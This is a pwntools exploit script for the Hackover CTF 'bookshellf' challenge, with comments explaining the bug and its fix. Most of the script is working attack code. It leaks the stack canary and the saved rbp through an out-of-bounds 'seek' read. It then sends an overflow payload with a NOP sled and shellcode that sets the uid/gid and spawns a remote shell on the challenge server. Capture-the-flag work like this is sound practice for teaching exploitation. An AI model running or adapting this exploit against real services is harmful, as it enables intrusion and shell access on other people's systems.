Hackover CTF bookshellf solution
# Hackover CTF "bookshellf" exploit script (pwntools).
#
# What it demonstrates: the service's book 'seek' command takes an offset that
# is not bounds-checked, so a read past the end of the buffer discloses stack
# contents (the canary and the saved rbp). With both values known, a later
# overflow can rebuild a valid frame and return into shellcode placed on the
# stack (the binary was built without NX, per the note below).
#
# Defender's takeaway: the canary and ASLR are defeated here only because the
# out-of-bounds read leaks them first; the fix is the bounds check on the seek
# offset, and a non-executable stack would additionally stop this payload.
#
# NOTE(review): the script concatenates str literals with recv() results and
# compares a single index of a recv() buffer with a one-char string, which
# matches Python 2 / older pwntools (str-based) semantics — presumably would
# need bytes literals under Python 3.
from pwn import * | |
context.os = 'linux' | |
context.arch = "amd64" | |
# Local process kept for debugging; the live target below is the CTF service.
#r = process("./bookshellf") | |
r = remote("challenges.hackover.h4q.it", 31337) | |
# using the book 'seek' function we can read past the array boundary and leak memory | |
# we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set) | |
## Get stack canary | |
# Menu choice "1" opens a book; the prompt is consumed and any leftover
# buffered output is discarded before sending the file name.
r.sendline("1") | |
r.recvuntil(">") | |
r.clean() | |
r.sendline("memory.txt") | |
r.recvuntil("continue?") | |
# Seek offset 30729 presumably lands one byte into the canary (the read skips
# its null least-significant byte, so only the remaining 7 bytes are leaked).
r.sendline("s30729") # last byte of stack canary is a null byte (probably ubuntu: http://phrack.org/issues/67/13.html) | |
r.recvuntil("more love!\n\n\n") | |
# Rebuild the full 8-byte canary by prepending the known null LSB.
canary = u64("\x00"+r.recvn(7)) | |
log.info("Got the stack canary: 0x%x" % canary) | |
# Decline to continue and return to the main menu for the next leak.
r.sendline("n") | |
r.recvuntil(">") | |
r.clean() | |
## Get rbp | |
# Same open/seek sequence, offset 30736 (= 30729 + 7, i.e. the 8 bytes right
# after the canary) — presumably the saved rbp of the enclosing frame.
r.sendline("1") | |
r.recvuntil(">") | |
r.clean() | |
r.sendline("memory.txt") | |
r.recvuntil("continue?") | |
r.sendline("s30736") | |
r.recvuntil("more love!\n\n\n") | |
# Only 6 bytes are meaningful in a user-space x86-64 pointer; the high byte is
# expected to be 0x7f for a stack address (sanity check on the leak).
getrbp = r.recvn(6) | |
assert getrbp[5] == "\x7f" | |
# Zero-extend the 6 leaked bytes to a full 64-bit value.
rbp = u64(getrbp + "\x00\x00") | |
log.info("rbp is at 0x%x" % rbp) | |
r.sendline("n") | |
r.recvuntil(">") | |
r.clean() | |
## Smash it! | |
r.sendline("1") | |
r.recvuntil(">") | |
r.clean() | |
# Payload layout: 31304 bytes of padding up to the canary slot, the leaked
# canary (so the stack check passes), the leaked saved rbp, then the return
# address set to rbp+32 — presumably pointing into the NOP sled that follows —
# and finally the shellcode (drop to uid/gid 1001, then spawn a shell).
r.sendline("A"*31304 + p64(canary) + p64(rbp) + p64(rbp+32) + "\x90"*100 + asm(shellcraft.setresuid(1001,1001,1001) + shellcraft.setresgid(1001,1001,1001) + shellcraft.sh())) | |
# Hand the connection over to the user for the interactive shell.
r.interactive() |